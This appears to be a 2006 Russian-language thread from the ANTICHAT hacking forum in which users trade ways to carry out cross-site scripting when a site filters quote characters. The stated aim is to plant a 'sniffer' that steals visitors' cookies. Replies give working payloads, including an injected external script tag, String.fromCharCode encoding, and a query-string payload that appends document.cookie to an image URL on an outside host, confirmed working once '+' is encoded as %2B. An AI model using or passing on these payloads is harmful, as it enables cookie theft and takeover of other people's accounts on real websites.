HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как можно произвести xss, если фильтруются кавычки?
  #1  
Старый 20.04.2006, 05:00
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
С нами: 10762826

Репутация: 1348


По умолчанию Как можно произвести xss, если фильтруются кавычки?

Скажите - как можно произвести xss, если фильтруются кавычки? Вариант с заменой на одинарные, %22 и на &/#22; , а также перенаправление на мой java-скрипт не предлагать. На серваке magic_quotes=on.

Последний раз редактировалось 1ten0.0net1; 20.04.2006 в 06:42..
 
Ответить с цитированием

  #2  
Старый 20.04.2006, 10:42
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
С нами: 10836326

Репутация: 239
По умолчанию

Одинарный ковычки тоже фильтруютя?
__________________
Никому нельзя верить...
 
Ответить с цитированием

  #3  
Старый 20.04.2006, 11:01
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию

Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)
__________________
Full DNS report
 
Ответить с цитированием

  #4  
Старый 20.04.2006, 11:14
K[o]S
Новичок
Регистрация: 29.07.2005
Сообщений: 20
С нами: 10938305

Репутация: 13
По умолчанию

Цитата:
Сообщение от Azazel  
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)
Ковычки могут понадобиться для того чтоб закрыть тег =)

Автор поясни какого типа XSS актив пасив мыло форум и т.д
 
Ответить с цитированием

  #5  
Старый 20.04.2006, 15:18
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
С нами: 10762826

Репутация: 1348


По умолчанию

Цитата:
Сообщение от Azazel  
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>
Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.
 
Ответить с цитированием

  #6  
Старый 21.04.2006, 01:46
Xex
Banned
Регистрация: 10.07.2005
Сообщений: 224
С нами: 10966535

Репутация: 50
По умолчанию

а просто тыги можешь использовать?...
ну например картинку вставить?...
Код HTML:
<img src="тут твой код или адрес снифера">
а далее можешь проверить:
Код HTML:
<script>alert(document.images[0].src)</script>
Как дальше использовать думаю разберешься...
 
Ответить с цитированием

  #7  
Старый 21.04.2006, 23:35
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
С нами: 10908092

Репутация: 2
По умолчанию

Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :-)
Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...
 
Ответить с цитированием

  #8  
Старый 21.04.2006, 23:46
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
С нами: 10908092

Репутация: 2
По умолчанию

r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src% 20=%20document.images[19].src+document.cookie;</script>
К примеру не подходит
 
Ответить с цитированием

  #9  
Старый 21.04.2006, 23:49
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
С нами: 10908092

Репутация: 2
По умолчанию

А, все, доперло - "+" = " "... как от этого избавиться? :-) & нельзя использовать, сразу говорю.

В виде "%ХХ" как "+" выглядит?

UPD: усе, спасибо, нашел :-) %2B - все работает

Последний раз редактировалось Laggi; 21.04.2006 в 23:52..
 
Ответить с цитированием

  #10  
Старый 24.05.2006, 13:23
Del
Новичок
Регистрация: 24.01.2005
Сообщений: 6
С нами: 11206163

Репутация: 0
По умолчанию

так как запрос без кавычек выглядит?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
№2_ Как увеличить производительность Windows Elekt Windows 34 07.05.2010 15:16
Как восстановить нечитающийся Cd? novichok "Железо" 8 02.05.2007 12:15
Фразы о жизни novichok Болталка 10 15.07.2006 21:04
Lineage 2 Chronicle 4 Inferno Болталка 1 02.02.2006 16:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.